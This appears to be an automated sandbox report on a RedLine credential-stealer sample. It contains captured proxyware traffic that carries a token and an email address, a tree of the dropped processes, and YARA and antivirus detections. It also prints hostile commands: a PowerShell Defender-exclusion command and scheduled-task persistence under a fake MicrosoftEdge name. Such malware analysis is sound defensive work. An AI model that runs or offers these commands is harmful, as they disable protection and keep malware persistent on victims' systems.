2022-11-24 11:21:26 UTC	57	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:26 UTC	57	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:26 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c2d2cf168fdc-FRA
2022-11-24 11:21:26 UTC	58	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
85	192.168.2.3	49965	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:26 UTC	58	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:26 UTC	58	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:26 UTC	58	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:26 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c2d48fd9bbce-FRA
2022-11-24 11:21:26 UTC	58	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
86	192.168.2.3	49967	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:26 UTC	58	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:26 UTC	59	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:27 UTC	59	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:27 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c2d65f5b91f6-FRA
2022-11-24 11:21:27 UTC	59	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
87	192.168.2.3	49972	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:27 UTC	59	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:27 UTC	59	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:27 UTC	60	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:27 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c2db088c5bdd-FRA
2022-11-24 11:21:27 UTC	60	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
88	192.168.2.3	49975	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:27 UTC	60	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:27 UTC	60	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:27 UTC	60	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:27 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c2dccaa65c9e-FRA
2022-11-24 11:21:27 UTC	60	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
89	192.168.2.3	49978	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:28 UTC	61	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:28 UTC	61	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:28 UTC	61	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:28 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c2de7dc69066-FRA
2022-11-24 11:21:28 UTC	61	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49734	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:20:50 UTC	5	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:20:50 UTC	6	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:20:50 UTC	6	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:50 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c1f1ee3ebb86-FRA
2022-11-24 11:20:50 UTC	6	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
90	192.168.2.3	49981	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:28 UTC	61	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:28 UTC	61	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:29 UTC	62	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:29 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c2e03e6b9956-FRA
2022-11-24 11:21:29 UTC	62	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 6iWK0k820U.exePID: 5796, Parent PID: 3452

General

Target ID:	0
Start time:	12:19:11
Start date:	24/11/2022
Path:	C:\Users\user\Desktop\6iWK0k820U.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\6iWK0k820U.exe
Imagebase:	0x400000
File size:	248320 bytes
MD5 hash:	314E1E071F0664E0A39093313B394633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.254324630.000000000041C000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.253928530.000000000041C000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.252173765.0000000000522000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5788, Parent PID: 5796

General

Target ID:	1
Start time:	12:19:11
Start date:	24/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: vbc.exePID: 5980, Parent PID: 5796

General

Target ID:	2
Start time:	12:19:14
Start date:	24/11/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Imagebase:	0xc80000
File size:	2688096 bytes
MD5 hash:	B3A917344F5610BEEC562556F11300FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 6072, Parent PID: 5796

General

Target ID:	4
Start time:	12:19:16
Start date:	24/11/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 232
Imagebase:	0xee0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: brave.exePID: 6104, Parent PID: 5980

General

Target ID:	14
Start time:	12:19:59
Start date:	24/11/2022
Path:	C:\Users\user\AppData\Local\Google\brave.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Google\brave.exe"
Imagebase:	0x7ff6a6000000
File size:	2884608 bytes
MD5 hash:	9253ED091D81E076A3037E12AF3DC871
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 85%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 3956, Parent PID: 6104

General

Target ID:	15
Start time:	12:20:01
Start date:	24/11/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff6bcc00000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1112, Parent PID: 3956

General

Target ID:	16
Start time:	12:20:01
Start date:	24/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ofg.exePID: 4820, Parent PID: 5980

General

Target ID:	17
Start time:	12:20:01
Start date:	24/11/2022
Path:	C:\Users\user\AppData\Local\Google\ofg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Google\ofg.exe"
Imagebase:	0xf80000
File size:	88064 bytes
MD5 hash:	33DAD992607D0FFD44D2C81FE67F8FB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: C:\Users\user\AppData\Local\Google\ofg.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 10%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 4704, Parent PID: 4820

General

Target ID:	18
Start time:	12:20:01
Start date:	24/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Imagebase:	0xe20000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1332, Parent PID: 4704

General

Target ID:	19
Start time:	12:20:01
Start date:	24/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 5400, Parent PID: 5980

General

Target ID:	20
Start time:	12:20:03
Start date:	24/11/2022
Path:	C:\Users\user\AppData\Local\Google\chrome.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Google\chrome.exe"
Imagebase:	0x10000
File size:	6423552 bytes
MD5 hash:	8CD1EA50F8F4C45055400E70DA52B326
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: ofg.exePID: 4272, Parent PID: 1080

General

Target ID:	21
Start time:	12:20:05
Start date:	24/11/2022
Path:	C:\Users\user\AppData\Local\Google\ofg.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Google\ofg.exe
Imagebase:	0xf80000
File size:	88064 bytes
MD5 hash:	33DAD992607D0FFD44D2C81FE67F8FB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 2576, Parent PID: 4272

General

Target ID:	22
Start time:	12:20:09
Start date:	24/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Imagebase:	0xe20000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6020, Parent PID: 2576

General

Target ID:	23
Start time:	12:20:12
Start date:	24/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5508, Parent PID: 5400

General

Target ID:	25
Start time:	12:20:11
Start date:	24/11/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
